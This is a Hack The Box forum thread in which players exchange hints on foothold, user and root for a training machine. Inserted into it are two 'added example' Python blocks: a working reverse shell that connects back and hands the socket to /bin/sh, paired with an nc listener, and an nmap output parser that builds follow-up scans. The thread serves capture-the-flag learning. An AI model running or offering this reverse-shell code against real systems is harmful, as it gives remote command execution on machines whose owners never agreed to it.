@rafff said:
Hey guys, I may need some help. After the main page, I saw the i** port open, even connected to it (I never really used this kind of chat). Searched for related exploits and found one. But when I try to use it on our well-known msf, it doesn't open a session for me... Am I on the right track? Or should I look elsewhere? (Of course I double-checked the options I set.)
Are you sure it doesn't open a session? Some MSF exploits produce access in less obvious ways, so don't always expect a big notification saying session created.
If you get an "exploit completed but unable to create a session" message, then double-check your choice of exploit, your options and the RPORT you are targeting, to reduce the chance it is just user error.
The initial foothold on this box is definitely possible with msf.
Happy to help people, but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I can't help. This isn't Twitter, so my DMs are always open.
Double-check that is true. The choice of payload changes what your MSF session will tell you. For example, if your payload isn't meterpreter, don't expect a meterpreter session.
Happy to help people, but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I can't help. This isn't Twitter, so my DMs are always open.
I wanted to do it without msf; it was a custom payload and not a single thing worked, no matter what I made it do. I found, for those that have had issues with non-msf exploitation (it seems like most have), that it has to do with the specific timing of when you send the payload, which isn't actually clear at all when you look into what msf is actually doing, and the CVEs don't mention it either.
Just a note for those who want to do it the old fashioned way.
I got my shell manually, with just nc and a python rev shell. The exploit was very straight forward. Doing it manually meant I could monitor what the system responses were.
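The nc listener plus Python reverse shell mentioned in the post above, run end to end on loopback as an added demonstration (example code, not the poster's payload): a thread stands in for `nc -lvnp PORT`, the reverse-shell function connects back and hands the socket to /bin/sh, and the listener sends a couple of commands and reads the responses, which is exactly what lets you watch the system's replies when doing it by hand. The host, port and commands are chosen for the example, and a POSIX /bin/sh is assumed.

```python
import socket
import subprocess
import threading
from typing import Dict, List, Optional

# Added example, not code from the thread: the nc + Python reverse-shell
# pattern run against itself on loopback so the shell's responses can be read.
# Assumptions: a POSIX /bin/sh exists and 127.0.0.1 is reachable.


def reverse_shell(host: str, port: int, shell: str = "/bin/sh") -> int:
    """Connect back to host:port and wire the socket to a shell.

    This is the core of the usual Python one-liner: stdin, stdout and stderr
    of the spawned shell are the socket, so whoever is listening types the
    commands and sees the output. Returns the shell's exit status once the
    listener closes its write side (EOF on the shell's stdin).
    """
    sock = socket.create_connection((host, port))
    try:
        proc = subprocess.run(
            [shell],
            stdin=sock.fileno(),
            stdout=sock.fileno(),
            stderr=sock.fileno(),
        )
    finally:
        sock.close()
    return proc.returncode


def listener(server: socket.socket, commands: List[str], results: Dict[str, str]) -> None:
    """Stand-in for `nc -lvnp PORT`: accept one shell, send commands, collect output."""
    conn, _peer = server.accept()
    with conn:
        conn.sendall(("\n".join(commands) + "\n").encode())
        conn.shutdown(socket.SHUT_WR)  # done typing; the shell sees EOF and exits
        chunks = []
        while True:
            chunk = conn.recv(4096)
            if not chunk:              # shell exited and the far side closed the socket
                break
            chunks.append(chunk)
    results["output"] = b"".join(chunks).decode(errors="replace")


def demo(commands: Optional[List[str]] = None) -> str:
    """Run listener and reverse shell against each other; return what the listener saw."""
    if commands is None:
        commands = ["echo reverse-shell-ok", "pwd"]
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind(("127.0.0.1", 0))      # port 0: let the OS pick a free port
    server.listen(1)
    port = server.getsockname()[1]
    results: Dict[str, str] = {}
    worker = threading.Thread(target=listener, args=(server, commands, results))
    worker.start()
    reverse_shell("127.0.0.1", port)   # the "victim" side, connecting back
    worker.join()
    server.close()
    return results["output"]


if __name__ == "__main__":
    print(demo(), end="")
```

On a real engagement the listener half is simply `nc -lvnp PORT` on your own host and the `reverse_shell` function collapses to the familiar one-liner; the point of keeping the two halves in one script is that you can see every byte the shell sends back, including error text that a framework would swallow.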
@Gogonnash said:
I'm going crazy about the steg part. I read all the hints in this thread but still no clue.
Are both lines important?
Yes - what does one of those words relate to? It's hidden in plain sight.
I know what each of these words means, but I can't find a use in this context. Can I PM you? I want to know if my thoughts are going in the right direction.
Got root... user is quite simple; however, the machine is unstable and there are many resets, therefore the exploit often does not work... you have to try several times.
Root is very simple if you find the right thing.
Honestly - everything you need for foothold, user and root is in this thread
Foothold - enumerate properly - check all ports, then use Google
User - again, enumerate properly. Specifically for things you can't see straight away. When you find something interesting, all the information you need is there - it's staring you right in the face
Root - Enumerate again, look for files that can be exploited, then look again for something you may not find in a standard Linux installation
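The "check all ports" and "things you can't see straight away" advice above, in practice, as an added example that is not part of the thread: parse the grepable output of a full-range nmap sweep (`nmap -p- -oG full.gnmap TARGET`), flag the high ports a quick top-ports scan may skip, and emit the targeted service scan for only the ports found open. The scan output, host and ports in the block are constructed for the example and do not describe any particular machine.

```python
import re
from typing import Dict, List, Tuple

# Added example, not from the thread. After a full TCP sweep such as
#   nmap -p- -oG full.gnmap TARGET
# this pulls the open ports out of nmap's grepable output, flags the ones a
# quick top-ports scan tends to miss, and builds the targeted follow-up scan.
# The scan output below is constructed for the example; the host and ports
# are not any particular machine's.
SAMPLE_GNMAP = (
    "# Nmap 7.80 scan initiated as: nmap -p- -oG full.gnmap 10.0.0.5\n"
    "Host: 10.0.0.5 ()\tStatus: Up\n"
    "Host: 10.0.0.5 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, "
    "111/closed/tcp//rpcbind///, 8443/open/tcp//https-alt///, "
    "31337/open/tcp//Elite///\tIgnored State: filtered (65530)\n"
    "# Nmap done\n"
)

# grepable port field: port/state/protocol/owner/service/rpcinfo/version/
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)/[^/]*/([^/]*)/[^/]*/[^/]*/")

OpenPort = Tuple[int, str, str]  # (port, protocol, service name nmap guessed)


def parse_open_ports(gnmap: str) -> Dict[str, List[OpenPort]]:
    """Map each host to its open ports, in ascending port order."""
    hosts: Dict[str, List[OpenPort]] = {}
    for line in gnmap.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        # the Ports: field ends at the tab before "Ignored State:"
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for port, state, proto, service in PORT_RE.findall(ports_field):
            if state == "open":
                hosts.setdefault(host, []).append((int(port), proto, service))
    for ports in hosts.values():
        ports.sort()
    return hosts


def high_ports(hosts: Dict[str, List[OpenPort]], threshold: int = 1024) -> Dict[str, List[int]]:
    """Open ports at or above `threshold`: the ones worth poking by hand
    (nc -v HOST PORT), since a default or top-ports scan may not show them."""
    return {
        host: [p for p, _proto, _svc in ports if p >= threshold]
        for host, ports in hosts.items()
    }


def followup_scan(hosts: Dict[str, List[OpenPort]]) -> List[str]:
    """One version/script scan per host, restricted to the ports found open."""
    cmds = []
    for host, ports in hosts.items():
        plist = ",".join(str(p) for p, _proto, _svc in ports)
        cmds.append(f"nmap -sC -sV -p {plist} -oN {host}_svc.nmap {host}")
    return cmds


if __name__ == "__main__":
    found = parse_open_ports(SAMPLE_GNMAP)
    for host, ports in found.items():
        print(host, ports)
        print("  high ports:", high_ports(found)[host])
    for cmd in followup_scan(found):
        print(cmd)
```

Feed it a real `-oG` file instead of the constructed sample and the `high_ports` list is where the "then use google" step starts: the service name nmap guesses for an unusual port is the search term.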
One of the ironic things about this box on the Free servers is that the constant resets make it hard to get user.txt but, because lots of people are lazy in how they own the box, if it isn't reset, it can be really hard to see the easiest path to root.
Happy to help people, but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I can't help. This isn't Twitter, so my DMs are always open.
@TazWake said:
One of the ironic things about this box on the Free servers is that the constant resets make it hard to get user.txt but, because lots of people are lazy in how they own the box, if it isn't reset, it can be really hard to see the easiest path to root.
User was really fun to get. Pretty straightforward too.
I'm stuck on Root however. I've run many enum tools but I can't find any nudge as to where to look. Maybe I'm burnt out, but could anyone send me in the right direction?
I found the b file, I understood it and know where it comes from, but still stuck... Any hints?
Edit: I tried using the thing's name as password, things like that, and nothing.
@vitorfhc said:
I found the b file, I understood it and know where it comes from, but still stuck... Any hints?
Edit: I tried using the thing's name as password, things like that, and nothing.
I'm in the exact same situation at the moment. Got the file and seem to get the general idea of it, but I'm still overlooking something (probably something trivial as well). Can someone PM me for a nudge in the right direction?
Edit: Thank you all for the amazing help! I managed to find user. As most, I was making it way too complicated in my head and overlooked things that I shouldn't have. Good learning experience, though.
The b* file refers to another methodology that is used to obfuscate data from a very specific file type. Look at the sections under 'Challenges' on HTB and compare the text above the password
OSCP
If at first you don't succeed, google the error message
Working on the priv esc. Pretty sure I'm right there; I've found the interesting part, just cannot figure out how to use this. Assuming it's something simple.
Shell, user and rooted. Really enjoyed this box; it taught me to look back sometimes and not only forward, alongside making sure not to overthink too much.
@ZaphodBB said:
Honestly - everything you need for foothold, user and root is in this thread
Foothold - enumerate properly - check all ports, then use Google
User - again, enumerate properly. Specifically for things you can't see straight away. When you find something interesting, all the information you need is there - it's staring you right in the face
Root - Enumerate again, look for files that can be exploited, then look again for something you may not find in a standard Linux installation
Couldn't agree more. Root is just about paying attention
Owned the machine.
User was straightforward. It was fun to do it, but not much of a challenge.
Root was really tricky. It's a really small detail that I believe many, many people will overlook. The technique itself is basic.
Can anyone tell me where, or maybe how, to look for root... I tried all the basic priv escalation techniques and can't figure out where that tiny detail is!
I used an enumeration script and went through everything it listed, then I went on to a bunch of similar articles that led me to a "one liner" that suggested a few options; something stuck out, I poked and prodded at it, and it worked...
Comments
Still looking for priv esc... any hints, please?
Edit: Finally rooted...
Finally root
Rooted ... good box.
There are plenty of good hints in here. Everything you need is in this thread.
I agree ... that's what happened to me :-))
PM me what you have and I'll see if I can help.
Can someone PM me for help? Stuck at low priv shell..
EDIT: Got user
Pm for hints
Got user... root is pretty tricky for me... nudge?
Can someone PM me for help? Stuck on the b file.
EDIT: Got it! Thanks to @ZaphodBB & @Sigilli
Can I have a hint on root? I am pretty new to this. Also I don't want spoilers, just hints, I tried a lot of priv esc techniques from https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ but maybe I let something pass...